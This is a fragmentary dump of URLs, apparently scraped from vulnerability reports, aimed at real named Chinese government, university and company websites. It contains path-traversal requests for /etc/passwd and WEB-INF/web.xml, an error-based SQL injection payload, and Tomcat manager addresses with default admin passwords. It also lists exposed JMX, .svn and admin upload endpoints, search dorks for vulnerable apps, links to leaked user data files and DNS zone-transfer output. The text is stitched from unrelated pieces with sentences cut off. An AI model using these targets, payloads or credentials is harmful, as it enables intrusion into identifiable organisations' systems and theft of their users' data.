http://moa.xjtu.edu.cn:9083//file/oa@xajt.zip/?filePath=../../etc/passwd text-align:right padding-left:300px text-decoration:none http://3g.169ol.com/wdfsearch.psml http://3g.169ol.com/spbrief.psml?sp_parentcode=06 http://www.haitiansoft.com/ http://121.30.226.44/login.asp http://124.65.69.14/login.asp http://vos.tjufe.edu.cn/login.asp http://211.68.250.42/login.asp http://www.fzsyxx.com/oa/ http://oa.ccib.com.cn/login.asp http://www.cnshuiyu.com/login.asp http://oa.tjfsu.edu.cn/login.asp http://old.mdjagri.gov.cn/oa/login.asp http://60.171.34.204:8086/ http://116.228.82.237/login.asp http://dfoa.shhjwl.com/login.asp http://www.cnshuiyu.com/login.asp http://211.68.192.21/login.asp http://121.30.226.44/login.asp http://180.166.7.94/login.asp http://cqkyoa.oicp.net/login.asp inurl:gov.cn inurl:list.action?channelId http://www.qx.gov.cn/cms/qx/list.action?redirect:http://www.yahoo.com/ www.sxgujiao.gov.cn/gov/gujiao/list.action?redirect:http://www.yahoo.com/ http://www.tyfoa.gov.cn/szf/wqb/list.action?redirect:http://www.yahoo.com/ http://www.hbrq.gov.cn/adm/videolist.php inurl:/news/list.asp?news_id= http://www.time.net.cn/news/list.asp?news_id=112 http://www.time.net.cn/count/ http://www.hedz.gov.cn/news/list.asp?news_id=640 http://www.tc12315.gov.cn/news/list.asp?news_id=1682 www.njgh.gov.cn http://www.taobao.com/go/app/tmall/login-is-api.php http://www.taobao.com/go/app/test/test4444.php inurl:/Web_Org/ inurl:Web_Org/Notice_info.aspx?infoid= http://www.zhiyuan-peixun.com/Web_Org/news_info.aspx?infoid=204 http://www.zhiyuan-peixun.com/Web_Org/St_Son_Index.aspx?infoid=4013%27 http://www.zhiyuan-peixun.com/Web_Org/course_info.aspx?infoid=4105%27 http://www.zhiyuan-peixun.com/Web_Org/LiveCourse_info.aspx?infoid=6%27 http://www.zhiyuan-peixun.com/Web_Org/Tch_Info.aspx?infoid=2026%27 http://www.gxkjks.com/Web_Org/Notice_info.aspx?infoid=29 http://www.sqlmap.org www.gxkjks.com\session http://dazoufang.liling.gov.cn/govnews/ly-write.asp http://dazoufang.liling.gov.cn/govnews/ inurl:getclick.jsp?infoid= http://www.c-ncap.org.cn/cms/cms/infopub/getclick.jsp?infoid=1192494709 http://www.sqlmap.org www.c-ncap.org.cn\session http://219.242.65.10/ArticleShow.aspx?SectionId=181b46a7-4342-4daf-94b1 http://www.sqlmap.org inurl:celerityAlleywayDetail.do http://zwdt.tz.gov.cn/riseapprove_web/indexGetDatags.do?depNO=JS061200F http://www.sqlmap.org http://www.hshsh.pudong-edu.sh.cn/be/ber_upload_rank.jsp?direction=0 http://www.sqlmap.org www.hshsh.pudong-edu.sh.cn\session http://yjsc.jzmu.edu.cn/right_js.asp?classid=6 inurl:listkaoshi.asp?shijuanid= http://xitong.mingjuan.net/e-learning/listkaoshi.asp?shijuanid=580 http://www.sqlmap.org inurl:shownews.asp www.musicziko.com www.shengmingchen.com www.mdxkj.com www.cskstdz.com www.wzyfdz.com http://www.vansoon.com/ProductShow.asp?ID=132 http://www.vansoon.com/CompHonorBig.asp?id=29 http://www.yzb.bupt.cn/admin_upload.php?a1=%BF%BC%C9%FA%D2%E2%CF%F2%B1%ED.doc http://www.yzb.bupt.cn/admin_upload.php?a1=../php/student1.php http://www.yzb.bupt.cn/admin_upload.php?a1=../../../../../etc/passwd http://wapzz.cn/admin/Login.aspx http://www.bjcyh.com.cn/ask/tsyj_nr.php?tid=174 http://www.xusoft09.cn/ http://www.top-solution.cn/index.php?op=about&t=28 http://www2.xiaolan.cn/message.php?op=msg_show&id=5111 http://www.dgtxxf.com/main/data.php?id=381&dir_id=0202 http://www.xlgp.gov.cn/web/info/info_show.jsp?record_id=4196 http://www.zssph.com/json/jlist.php?Si=1 http://www.zssta.org.cn/front/kexie/page_list.jsp?menu_id=38 http://www.zsrd.gov.cn/web/ztx.php?lib_id_more=208&lib_id=206 http://www.zsxlyy.com/index.php?op=news_da&type=21&id=771 http://www.hnkjt.gov.cn/ http://www.zhongke.com//admin/inc/wnews.php?type=1&path=video&form=frmList&formname=img www.huoyan.tv http://218.76.137.44/00/ugc/9/74/9ecbc603bc1c96d8226f265198ef19fc82255b01/9ecbc603bc1c96d8226f265198ef19fc82255b01.pfv http://www.uccb.com.cn/indexpage/more.jsp?postion=046198209&classid=121&newstype=yn http://www.170.com/manager/html/ http://sports.chd.edu.cn/newUI/sort.asp?sortID=7&ASSortID=27 http://sports.chd.edu.cn/newUI/shownews.asp?id=298 http://sports.chd.edu.cn/htmleditor/upload.asp http://shop.gexia.com/siteserver/login.aspx http://job.39.net http://job.39.net/Handler/Job.ashx?fn=JobList&pageno=1 post:workplace=%e9%8d%8f%e3%84%a9%e5%84%b4&RecruitType=10&category=1 http://www.170.com/mallPortal/ajax/item/number/query?ajax=true®ionId=11&phoneTypeId=A01&specialId=5&queryFlag=2&resCode=38&searchKey=1111&maxNum=20&sourceFlag=2 http://www.mysyyh.com/www.mysyyh.com.zip http://www.hangankeji.com/ShowHome.action http://tvs.tcl.com/Admin/TCLService/WebEdior/admin/login.aspx http://multimedia.tcl.com/userfiles/ http://wsxx.cdu.edu.cn/about/About.php?ID=1 http://wsxx.cdu.edu.cn/news/detail.php?ID=2123066389&ClassID=1 http://wsxx.cdu.edu.cn/news/xsgz_detail.php?ID=1883493617&ClassID=12 http://wifi.uzai.com/default.aspx http://wifi.uzai.com/WebResource.axd?d=NwnXfrE_urdm6KDmUSQIw_vuKssg8zTAl01cPwgVKDzsRBdpTJIOOnC9ivVqs-9Lo-OSb5qkR_zND4fgZGf8GCRdWGHVBHbbLfEMVhzyGDQ1 http://www.ruixiaohua.cn/ inurl:xyjs.asp?Txy= inurl:Biogenic.asp?Tbynf= http://www.bjtour.com.cn/searchLines.aspx?LStartDate=1%27 http://www.bjtour.com.cn/searchLines.aspx?sMoney=0&eMoney=100%27 http://www.bjtour.com.cn/searchLines.aspx?days=1%27 http://www.bjtour.com.cn/searchLines.aspx?toAdd=aa%27 http://www.bjtour.com.cn/searchLines.aspx?LStartDate=1 http://www.sqlmap.org www.bjtour.com.cn\session http://www.fjforestry.gov.cn:38501/Web/Course.aspx?typeid=28 http://www.fjforestry.gov.cn:38501/Web/CourseInfo.aspx?infoid=7 http://www.fjforestry.gov.cn:38501/Web/FCourse.aspx?typeid=32 http://www.fjforestry.gov.cn:38501/Web/FCourseInfo.aspx?infoid=3 http://www.fjforestry.gov.cn:38501/Web/GovQa.aspx?isnu=1 http://www.fjforestry.gov.cn:38501/Web/GovQa_Info.aspx?askid=9 http://www.fjforestry.gov.cn:38501/Web/New.aspx?typeid=4 http://www.fjforestry.gov.cn:38501/Web/Notice.aspx?typeid=2 http://www.fjforestry.gov.cn:38501/Web/New_Info.aspx?infoid=5&type=notice http://www.fjforestry.gov.cn:38501/Web/Together.aspx inurl:tripCity.aspx?cityid= http://www.kouclo.com/usercenter_order/my_order http://www.kouclo.com/usercenter_order/my_order http://cee.xmu.edu.cn/ContentShow.aspx?Id=P1 http://www.changedu.com/ http://sjjx.njit.edu.cn http://math.hit.edu.cn/news.do?cmd=show&id=1234 http://www.wwsjyw.net/admin/admin_login.asp http://www.rwsk.zjut.edu.cn/kycx/kycx.asp?sort_id=1 inurl:vipzjabout.php?id= http://www.xhhouse.net/vipzjabout.php?id=1436741 http://www.zhqfc.cn/vipzjabout.php?id=1450620 http://www.0662f.com/vipzjabout.php?id=1000124 http://www.txfc.net/vipzjabout.php?id=1012863 http://www.cnfczy.com/vipzjabout.php?id=1436228 http://member.aili.com/?c=content&m=index&a=morePic http://member.aili.com/?c=content&m=index&a=moreArc http://www.hbnsyh.com/show.asp?id=573 http://www.nj3000plan.org/ http://www.xnai.edu.cn/libwww/detail.jsp?id=192 http://www.dnion.com/太坑,站点不安全。不过用户较多,测试能破解出若干账号,腾讯只是一例。 http://customer.dnion.com/ http://runreport.dnion.com/ http://pushdx.dnion.com/ http://v.qq.com/ http://v.qq.com/page/q/i/h/q0107vgfzih_0.html http://bbs.kangq.com/config/config.php http://myduty.iflytek.com/Trans/Quaere/Quaere_View.aspx?look=look&QuaereBillId=3452 http://centpm.iflytek.com/Trans/Quaere/Quaere_View.aspx?look=look&QuaereBillId=3372 http://www.ica.org.cn/admin/login.aspx http://admin.comic.qq.com/site/getScore?jsonpCallbackParam=initStarSuccessCallback&eid=278%20and%20UpdateXML%281,CONCAT%280x5b,mid%28%28SELECT%20database%28%29%29,1,32%29,0x5d%29,1%29%23&ajax=true&_=1406730256944 http://dati.labs.10086.cn/papersurvey/WebPaper.action http://tieba.baidu.com/p/3197673292?fr_bdps_bottom_login=1&autolike=1 http://rsc.ruc.edu.cn/index.html http://down.qibosoft.com/down.php?v=v7 http://www.papajohnschina.com/online/index.jsp?lang=zh_CN http://www.zhongdongli.com http://ba.hbzj.net/login.aspx http://cs.anjuke.com/agency/store/71851W0QQpZ1QQtabZ0QQp3Z713 http://www.hxu.edu.cn/pages/News/list.php?id=6687&type=%22查询到数据库 http://ac.qq.com/CartoonComment/getCommentList http://home.cq.fang.com/UserFiles/File/logo.aspx http://www.syrcbank.com/bank/category.aspx?item=006001 inurl:info.aspx?Code= http://www.312000.net/admin/index.aspx http://www.dyhospital.com/admin/index.aspx http://www.wlsph.com/admin/index.aspx inurl:info.aspx?Code= http://www.312000.net/admin/dialog/FileList.aspx?code=0&show=true&path=./Admin http://www.dyhospital.com/admin/dialog/FileList.aspx?code=0&show=true&path=./ http://www.wlsph.com/admin/dialog/FileList.aspx?code=0&show=true&path=./Admin/Dialog http://www.312000.net/admin/dialog/fileupload.aspx?type=1&path=./Admin/Dialog http://www.dyhospital.com/admin/dialog/fileupload.aspx?type=1&path=./Admin/Dialog http://www.wlsph.com/admin/dialog/fileupload.aspx?type=1&path=./Admin/Dialog http://agent.xinnet.com http://szsupport.weixin.qq.com/cgi-bin/mmsupport-bin/qrcodelogin?username=*********&key=*************&clientversion=25030133&devicetype=android-18&lan=zh_CN&uuid=AXBIICc4sUSDsFnefkNP&pass_ticket=DebNjGnP2dJnq1bMvHvgL%2BezqqE70Ry9iWB625%2FRT8RRnwCD3tlq3qxuxG5YPzhx http://mp.weixin.qq.com/s?__biz=**********==&mid=10000001&idx=1&sn=bdc73ae816f2e7097c225b6070b1f2f2&from=singlemessage&isappinstalled=0#rd http://login.weixin.qq.com/confirm?uuid=e921eed1fbf84e&key=*****************&lang=zh_CN&scan=1406467880&clientversion=25030133&devicetype=android-18 https://login.weixin.qq.com/l/e921eed1fbf84e,经测试发现,可以直接把这个链接发送给用户访问,也可以达到用户扫描的效果 http://photogear.tuchong.com/ http://sec.sangfor.com.cn/trojan/?sid= http://my.mbaobao.com/member/profile/address,新增自己收货地址。 http://e-learning.lenovo.com.cn http://www.cqldbz.gov.cn/common/content.jsp?id=1904 http://visa.zjol.com.cn/visa/ajax/visa_select.aspx?t=type&countryid=13 http://pic.tongcard.net/MemberInfo/ http://www.jntc.nm.cn/zhaosheng/news.asp?id=686 http://www.vasee.com/user/userManager.jsp?item=editGroup http://eelab.zjnu.edu.cn/HomePage/ http://www.wwfchina.org/camp-progress.php?year=2014 inurl:NewsDetail.aspx?Id= http://www.hncdc.com.cn/hncdccms/loginVerify.jsp http://www.ayx.gov.cn/ayx/loginVerify.jsp http://www.hadc.gov.cn/info/loginVerify.jsp http://www.yrihr.com.cn/hky/loginVerify.jsp http://www.zzzxy.gov.cn/zzzx/loginVerify.jsp http://www.zygs.com/zygs/loginVerify.jsp http://www.hwswj.gov.cn/swjcms/loginVerify.jsp www.twgame.com.cn/c/?k=1 http://evewiki.tiancity.com/ http://118.***.**.*:8080/ http://118.***.**.*:8080/ http://***.client.189.cn:8006 http://www.lygey.com:8081/webInfoDetail.jsp?id=1334 http://www.ahhr.com.cn/dy/inf_infodtl.aspx?id=8312 http://www.daxian.cc/ http://www.hntzr.com/newslist.php?catid=110 http://www.hnxljkj.com/newslist.php?tid=4&catid=80 http://www.ruilai1994.com/news.php?tid=4&catid=73 http://www.haishangshengshi.com/news.php?tid=4&catid=82 http://www.gaosenjie.com/news.php?tid=4&catid=80 http://www.hnjdwj.com/news.php?tid=4&catid=94 http://www.hizyy.com/newslist.php?catid=33 http://www.ypguesthouse.com/news.php?tid=4&catid=96 http://www.hnyyj.com/singlepage.php?catid=74 http://www.hnlcjy.com/detial.php?&newsid=72 http://archives.lzu.edu.cn/pub/search/pub_default.asp?fmt=&fopen=&showtitle=&showbtn=&fpub=1&fid=227&id=29 http://dag.cufe.edu.cn/pub/search/pub_default.asp?fmt=&fopen=&showtitle=&showbtn=&fpub=1&fid=56&id=1 http://www.da.shu.edu.cn/pub/search/pub_default.asp?fmt=&fopen=&showtitle=&showbtn=&fpub=1&fid=563&id=36 http://dag.cug.edu.cn/pub/search/pub_default.asp?fmt=&fopen=_blank&showtitle=&showbtn=&fpub=1&fid=240&id=63 http://dawww.nju.edu.cn/pub/search/pub_default.asp?fmt=&fopen=&showtitle=&showbtn=&fpub=1&fid=108&id=13 http://www.sumwah.com http://www.mcjdc.com http://www.bothcctv.com http://www.szxiaxing.com http://www.menhuiauto.com Http://www.sonady.com Http://www.szhwp.com http://www.szsida.net http://www.guoxing.com.cn http://www.juexinzhipin.cn http://www.szxinhexing.com http://www.szgb888.cn http://www.hy-polycell.com http://www.rpxk.net http://www.szfp2008.com http://www.dphero.com http://www.111abc.com http://www.szpengwang.com http://www.alpsgym.cn URL:http://my.damai.cn/interaction/ComplaintsCreation.aspx?orderid=19668075 http://my.damai.cn/interaction/complaintsDetail/13583 http://my.damai.cn/interaction/complaintsDetail/1234 http://wsz.cq.gov.cn/ http://218.70.39.1/wscl/login.aspx http://sqlmap.org http://www.kuobunet.cn/ http://www.xilaisenwood.com/news_detail.asp?id=9 http://www.premase.com/news_detail.asp?id=127 http://www.deruitechnology.com/news_detail.asp?id=10 http://www.86lbs.com/news_detail.asp?id=128 http://www.huayixj.com/news_detail.asp?id=7 http://www.szyjbd.com/News_detail.asp?id=4 http://www.wsdsz.com/shownews.asp?id=23 http://www.gspro-power.com/news_detail.asp?id=13 http://www.winnerelec.com/news_detail.asp?id=10 http://www.cfdsz.com/news_detail.asp?id=18 http://dapei.mo.vancl.com/invoker/JMXInvokerServlet http://118.144.75.82/ http://www.co-mall.com/cases.html http://iflytek.com:7011/ http://win.fmail.21cn.com/resin-doc/examples/quercus-hello/viewfile?file=WEB-INF/web.xml http://caucho.com/ns/resin file:path=WEB-INF/db"/ http://www.xinhe99.com/ http://mail.damai.cn/ http://地址/.htpasswd http://123.150.254.20/login.cgi http://www.gnmz.gov.cn/login.cgi http://www.aoshuwang.cn/login.cgi http://www.bvclear.com.cn/login.cgi http://sc.gxpan.cn:8080/ http://sc.gxpan.cn:8080/index.php/login/dologin https://github.com/bird2014/yypt/blob/44a7287769b3ca8d991c2dc3eebd48f8031a0a3d/yypt/src/schema/01.sql http://www.zxtaw.com/admin/yb_list.asp?fs=&jiebie=&tarid=&types=&sslb=&keywordss=&lb=&la=&jbdw=&cbdw=&p=1 http://www.chizhoufgw.gov.cn/admin/ http://www.hbpu.edu.cn/shownews.asp?id=8387 http://www.esbchina.com/ http://taiheart.com/news/works_425.html http://www.bydoo.com.cn/ http://junyonglawyer.com/ http://www.youleshebeiwang.com/ http://www.fyjchem.com/ http://www.huataicapital.com/ http://www.klztkj.com/ http://www.junyonglawyer.com http://www.bjrtht.com http://www.aimtrip.com.cn http://www.ritaivm.com http://hanhong.swu.edu.cn/ http://shop.cgbchina.com.cn/BusinessCityWeb/eshop_jf/search/sGoodsJFArea.htm?areaid=00&jfRange=1-72000时,顺手在后面加了个单引号,结果弹框提示数据库错误。 http://www.hzsrsj.gov.cn/lemis/netweb/detail/download.jsp?url=../lemis/netweb/detail/&filename=download.jsp http://m.zuyaya.com/update_order_status.action?orderId=1435 http://m.zuyaya.com/update_order_status.action?orderId=1425 http://118.26.203.24:8086/ http://118.26.203.24:8087/缺陷地址 http://www.gettyimages.cn/ http://bbs.game.tom.com/forum.php http://www.cqgl.net/GZDT/List.aspx?n=18&id=18 www.rcwl.net inurl:webschool/Book/ http://zqzx.mhedu.sh.cn/webschool/Book/news_list.jsp?typeId=book0103 http://zqzx.mhedu.sh.cn/webschool/News/news_list.jsp?typeId=news31 http://zqzx.mhedu.sh.cn/webschool/Book/star.jsp?weekly=201429 http://zqzx.mhedu.sh.cn/webschool/Book/star.jsp?classId=cz201210&monthly=201406 http://zqzx.mhedu.sh.cn/webschool/Book/user_read.jsp?classId=cz201301&otherType=3 http://zqzx.mhedu.sh.cn/webschool/Book/news_list.jsp?classId=zqzx201206&typeId=book03 http://zqzx.mhedu.sh.cn/webschool/Book/book_read.jsp?classId=cz201301 http://zqzx.mhedu.sh.cn/webschool/Book/class.jsp?classId=cz201105 http://zqzx.mhedu.sh.cn/webschool/Book/book_list.jsp?classId=cz201&otherType=1 http://www.syzx.fxedu.cn/webschool/Book/news_list.jsp?typeId=book0103 http://www.syzx.fxedu.cn/webschool/News/news_list.jsp?typeId=news31 http://www.syzx.fxedu.cn/webschool/Book/star.jsp?weekly=201429 http://www.syzx.fxedu.cn/webschool/Book/star.jsp?classId=cz201210&monthly=201406 http://www.syzx.fxedu.cn/webschool/Book/user_read.jsp?classId=cz201301&otherType=3 http://www.syzx.fxedu.cn/webschool/Book/news_list.jsp?classId=zqzx201206&typeId=book03 http://www.syzx.fxedu.cn/webschool/Book/book_read.jsp?classId=cz201301 http://www.syzx.fxedu.cn/webschool/Book/class.jsp?classId=cz201105 http://www.syzx.fxedu.cn/webschool/Book/book_list.jsp?classId=cz201&otherType=1 http://ltzx.zhedu.net.cn/webschool/Book/ http://www.jsgyve.com/webschool/Book/ http://zqzx.mhedu.sh.cn/webschool/Book/ http://beijiao.net.cn/webschool/Book/ http://www.zd7s.net:81/webschool/Book/ http://www.sh-luochuan.net/webschool/Book/ http://58.214.27.195/webschool/Book/ http://ltzx.zhedu.net.cn/webschool/Book/ http://www.msxl.pte.sh.cn/webschool/Book http://222.134.89.202:88/Book/ http://dct.cqbxzx.com/webschool/Book/ http://www.wqxx.fxedu.cn/webschool/MySpace/ http://zqzx.mhedu.sh.cn/webschool/MySpace/ http://www.syzx.fxedu.cn/webschool/NewsMng/ http://www.zrwy.pte.sh.cn/webschool/MySpace/ http://xjxx.qpedu.cn/webschool/MySpace/ http://www.clxx.pte.sh.cn/webschool/login http://www.jcsyxx.pudong-edu.sh.cn/webschool/MySpace/ http://mjcxx.edu.sh.cn/webschool/MySpace/ http://www.sjhxx.net/webschool/MySpace/ http://www.stxx.fxedu.cn/webschool/MySpace/ http://www.ptsunshine.cn/webschool/MySpace/ http://lvyou.elong.com/5622213/pictorial/a34b7s1e.html http://www.zhuoguang.net http://www.cqyywf.com/news/class/index.php?showtag=%E6%8B%89%E4%B8%81%E8%88%9E%E6%9C%8D http://www.cqxsl.com/plus/list.php?tid=20&channelid=24&gzfl=500 http://www.xpqwkj.com/shop/class/?showbrandid=15 http://www.cqhxjlm.com/photo/class/index.php?page=1&catid=3 http://www.cqqingqing.com/Search.php?keys=88952634 http://www.8090hq.com/about.php?typeid=2 http://jwbinfosys.zju.edu.cn/yjs_xxqr.aspx http://www.vasee.com/event/view.jsp?id=ff8080814790de9d014790ea252a0091 http://esb.imp.189.cn:8820/IMInterfaceCXF/servlet/ImRemote?mid=CKM&t=0.0125964623875916&callback=jQuery17107452902260702103_1406879705310&_=1406879705468&uid=sz189_cn inurl:Permission/Application_Query_List.aspx http://hengdong.gov.cn/Permission/Application_Query_List.aspx http://www.leiyang.gov.cn/Permission/Application_Query_List.aspx http://www.hyyfq.gov.cn/Permission/Application_Query_List.aspx http://zx.cq.gov.cn/Permission/Application_Query_List.aspx http://www.hyx.gov.cn/Permission/Application_Query_List.aspx http://www.hnchangning.gov.cn/Permission/Application_Query_List.aspx http://www.hengshan.gov.cn/Permission/Application_Query_List.aspx http://www.zhengxiang.gov.cn/Permission/Application_Query_List.aspx http://59.51.64.36:5544/Permission/Application_Query_List.aspx http://zmhd.yuhua.gov.cn/Permission/Application_Query_List.aspx http://2007.hengshan.gov.cn/Permission/Application_Query_List.aspx http://www.timber2005.com/ http://exam1.timber2005.com/default.aspx http://exam1.timber2005.com/system/Dep_Right.aspx http://food.ln.sina.com.cn/album-634491.html http://218.17.54.145:81/supplier/portal/login.jsp user:admin pass:123456 url:http://218.17.54.145:81/manager/html user:admin pass:admin http://*.swf的URL都是被允许的,且该URL最终会输出到下面代码所显示的位置: http://www.zbglj.com/Bs_NetBookRe.asp?id=85 http://www.zbglj.com/Bs_NetBookRe.asp?id=85 http://www.zbglj.com/page2.asp?strtype=5&type=lz http://www.zbglj.com/page2.asp?strtype=5&type=lz http://school.10010fj.cn/paipai/newshop/saleMobile_listMobile.action http://www.vasee.com/group/viewgroup.jsp?groupid=ff808081355fdcb8013579b528870583 url:http://61.164.37.12:81/manager/html user:admin pass:admin http://www.vasee.com/email https://www.tonghuafund.com/ http://112.65.148.50/ http://www.tonghuafu nd.com/invoker/JMXInvokerServlet system:type=ServerInfo http://www.hcgy.com.cn/news.php?id=4 www.hcgy.com.cn/news.php?id=4 www.hcgy.com.cn/news.php?id=4 http://www.qckd.net/news.asp?id=82 http://www.qckd.net/news.asp?id=71 http://www.qckd.net/news.asp?id=67 http://www.qckd.net/News.asp?ID=42 http://www.qckd.net/News.asp?ID=64 http://www.qckd.net/News.asp?ID=25 http://www.qckd.net/News.asp?ID=52 http://www.qckd.net/News.asp?ID=51 http://www.qckd.net/News.asp?ID=74 http://www.qckd.net/News.asp?ID=75 http://www.qckd.net/News.asp?ID=77 http://www.qckd.net/News.asp?ID=78 http://www.qckd.net/News.asp?ID=79 http://www.qckd.net/News.asp?ID=80 http://www.qckd.net/News.asp?ID=81 http://www.qckd.net/News.asp?ID=83 book.dahe.cn/center/add_del.asp?id=51505608 book.dahe.cn/center/add_del.asp?id=51505604 http://888.qq.com/p/index.php?c=mqqfollow&m=followCaipiao&callback=faa http://fund.ebank.spdb.com.cn/ http://www.cnfront.com/ http://www.ausone.com.cn/about.php?sid=25 http://www.cqzhuoao.com/about.php?sid=10 http://www.icxword.com/about.php?sid=7 http://www.cqaokai.com/news.php?sid=5&id=13 http://www.sheenauto.com/news.php?id=40 http://www.biran.com.cn/news.php?sid=17&id=96 http://www.ausone.com.cn/shop.php?sid1=94 http://www.cncqkx.com/news.php?sid=3&sid1=11&id=103 http://www.cqconco.com/news.php?id=15&id1=4&id2=4 http://www.qjyongyue.com/news.php?news_class=27&id=23 http://book.dahe.cn/center/add_edit.asp?id=51505604 http://book.dahe.cn/center/add_edit.asp?id=51505606 http:demo.zoomla.cn/user/usertalk/SelectFrient.aspx,按昵称查找,注入点 http://zhiyinlou.com/Cas/login http://www.zhiyinlou.com/admin/SysUsers/login http://counter.west263.com/index.asp?login=yes http://bbs.candou.com/ http://appgame.candou.com http://forum.home.news.cn/detail/133362891/1.html http://219.142.122.128 http://219.142.122.128/ewebeditor/admin http://cpst.hbu.edu.cn/ http://bbs.t2cn.com/ http://www.hzjw.gov.cn/ http://wap.hzjw.gov.cn/Account/LogOn http://www.hangzhou.gov.cn/ http://stb.hangzhou.gov.cn/info_detail.asp?id=24 http://www.gzhttp.com/wuyun.html http://www.gzhttp.com:8080/system/ http://www.gzhttp.com:8080/manager/html user:admin pass:shenlan http://www.wdaac.cn/Channel/TableDownLoadList.aspx?deptid=weihai393030 http://www.rcsp.cn/Channel/TableDownLoadList.aspx?deptid=weihai395002 http://xzfw.jiaocheng.gov.cn/Channel/TableDownLoadList.aspx?deptid=inspur014063 http://222.135.78.34:8086/Channel/TableDownLoadList.aspx?deptid=weihai395018 http://www.sdsp.cn/Channel/TableDownLoadList.aspx?deptid=weihai395007 http://www.rszwfwzx.gov.cn/Channel/TableDownLoadList.aspx?deptid=weihai395047 http://xzfw.yunyang.gov.cn/Channel/TableDownLoadList.aspx?deptid=yunyang001009 http://218.59.173.67:8002/Channel/TableDownLoadList.aspx?deptid=weihai395028 http://218.59.173.67/Channel/TableDownLoadList.aspx?deptid=weihai395036 http://gamebbs.xunlei.com/ http://gamebbs.xunlei.com/uc_server/ http://cp.veryeast.cn/ http://www.veryeast.cn/paycenter/cp/Pay.asp http://www.lenovostoreapp.com/admin/index.php/3c/sign/login http://lib.hebut.edu.cn/show06.asp?id=282 http://110.98.98.66/bin/PLATFORMWEB.html http://www.chinaunicom-a.com/chinaunicom.do?start=1&field=gddhzl&size=21&frametype=3 http://www.bjzj.gov.cn http://iflytek.com:808/ http://www.vasee.com/event/addevent.jsp(发布活动) http://pics.vasee.com/event/201408215094627272.jsp http://oa.hasee.com/function/help/read_help.php?HELP_ID=182 http://tsonline.lenovo.com.cn/solution/admin/editor.php http://yjs.nwu.edu.cn/eyschool/xcbd_content.php?id=4 https://github.com/thinksaas/ThinkSAAS/blob/bf7c544f3f04a5f4ef18f831b4f270049bd3d94c/data/mail_options.php http://203.130.45.156:10082/web-font/head_include.html http://203.130.45.158:10082/web-font/ http://www.3lsoft.com/.svn/entries http://www.7654.com/.svn/entries http://gx.021.com/.svn/entries http://shiyong.ltsoftware.net/action/base/B2BIndex/ http://nb.gfan.com/admin/index.php inurl:shownews.asp?id= http://www2.sjzue.edu.cn/sjycjy/shownews.asp?id=56 http://www.qizhigroup.com/shownews.asp?id=208 http://www.v1687.com/shownews.asp?id=33 http://www.hnlrhb.com/shownews.asp?id=6 http://www.hengchengky.com/shownews.asp?id=467 http://www.aqgjss.com/shownews.asp?id=40 http://www.80086006.com/shownews.asp?id=179 http://www.hbhywh.com/shownews.asp?id=34 http://yanduauto.com/kairui/shownews.asp?id=29 http://pass.10jqka.com.cn/login http://www.cjlu.edu.cn/cjlunew/Search.php?K=%27 http://111.75.206.248:8081/ http://116.52.13.46:2014/ http://113.140.74.6/ http://61.178.38.194:2014/ http://220.171.42.161:801/ http://60.190.2.79/ http://113.108.163.164:8080/ http://59.61.92.123:2014/ http://218.58.77.226:82/ http://124.93.228.165:92/ http://58.49.103.227:2014/ http://61.138.188.217:81/ http://218.12.43.28/ http://amic.jxagri.gov.cn/ http://amic.jxagri.gov.cn/jxmulu2014/ http://amic.jxagri.gov.cn url:http://61.180.150.130:80/manager/html user:admin url:http://116.226.86.43:80/manager/html user:admin pass:admin url:http://211.151.82.167:80/manager/html user:admin pass:admin url:http://218.57.241.30:80/manager/html user:admin http://218.57.241.30/SourceCode/LoginAction.action http://218.7.67.24/zs/printpage.asp?ArticleID=34 http://218.7.67.24/zs/printpage.asp?ArticleID=34 http://218.7.67.24/zs/printpage.asp?ArticleID=34 http://218.7.67.24/zs/printpage.asp?ArticleID=34 http://218.7.67.24/zs/printpage.asp?ArticleID=34 inurl:navigate.do http://zsjypt.cwgk.net/navigate.do?method=getPolicyinfoDataById&id=1188&menuNo=07 http://zcpingtai.huadu.gov.cn/navigate.do?method=newCountentById&id=6406&menuno=03 http://hz3z.cwgk.net:8899/navigate.do?method=getPolicyinfoDataById&id=2665&menuNo=07 http://218.14.157.178:8081/navigate.do?method=getPolicyinfoDataById&id=4587&menuNo=05 http://3z.kaiping.gov.cn/navigate.do?method=getPolicyinfoDataById&id=1917&menuNo=09 http://3zgl.zqdz.gov.cn/navigate.do?method=getPolicyinfoDataById&id=510&menuNo=05 url:http://221.7.5.55:80/manager/html user:admin url:http://118.194.38.253:80/manager/html user:admin http://58.250.153.8:8000/index.asp http://finance.chinapay.com/insurance/online/web/productList/initProductList.do?ATTRID=ATTR_INDEX_CXAQ http://finance.chinapay.com/manage/mis/system/userManage/passport/login/index.jsp https://reg.163.com/resetpwd/resetpwd.do?username=a123456@163.com http://www.lijiejie.com/wp-content/uploads/2014/08/corp.netease.com_emails.txt http://www.lijiejie.com/wp-content/uploads/2014/08/163_user_questions.txt http://www.lijiejie.com/wp-content/uploads/2014/08/126_user_questions.txt http://open.boc.cn/ http://open.boc.cn/ucs/public/user/checkEmail?usrid=1 http://open.boc.cn/ucs/public/user/checkEmail?usrid=1 http://www.donews.com/idonews/article/3602*.shtm http://www.ky-express.com/chanpin/default.aspx?article=lKnRGOB8 http://www.ky-express.com/jifen/giftfenlei.aspx?class=3 http://www.ky-express.com/command/checkvistorip.ashx http://61.95516.com/ http://61.95516.com/search?shen=%E5%9B%9B%E5%B7%9D&city=%E6%88%90%E9%83%BD&brand=%E5%A4%AA%E5%B9%B3%E6%B4%8B http://img.chinapay.com/data.tar http://www.ddjy.cug.edu.cn/joblist.jsp?channelID=9 http://www.vasee.com/event/view.jsp?day=2014-08-03&emid=ff80808146acac6f014770b306751ec2&id=ff80808146acac6f014770b305231eb8&sub= http://down.mumayi.com/94512 https://itunes.apple.com/cn/app/vasee/id488543987?mt=8 http://reg.kingdee.com/getpass.asp http://reg.kingdee.com/en/getpass.asp zone_server:42.62.41.195 address:123.126.93.163 zone_server:42.62.41.195 name:ks12.newsmth.net address:42.62.43.22 zone_server:42.62.41.195 name:nehalem.newsmth.net address:123.126.93.165 zone_server:42.62.41.195 name:phenom.newsmth.net address:123.126.93.162 zone_server:42.62.41.195 name:ns3.newsmth.net address:123.126.93.165 zone_server:42.62.41.195 name:gift.newsmth.net address:123.126.93.167 zone_server:42.62.41.195 name:war.newsmth.net address:123.126.93.181 zone_server:42.62.41.195 name:ks1.newsmth.net address:42.62.41.195 zone_server:42.62.41.195 name:ks2.newsmth.net address:42.62.41.196 zone_server:42.62.41.195 name:bloom.newsmth.net address:123.126.93.164 zone_server:42.62.41.195 name:cncatt.newsmth.net address:60.2.251.7 zone_server:42.62.41.195 name:cncatt.newsmth.net address:123.126.93.162 zone_server:42.62.41.195 name:2.newsmth.net address:123.126.93.164 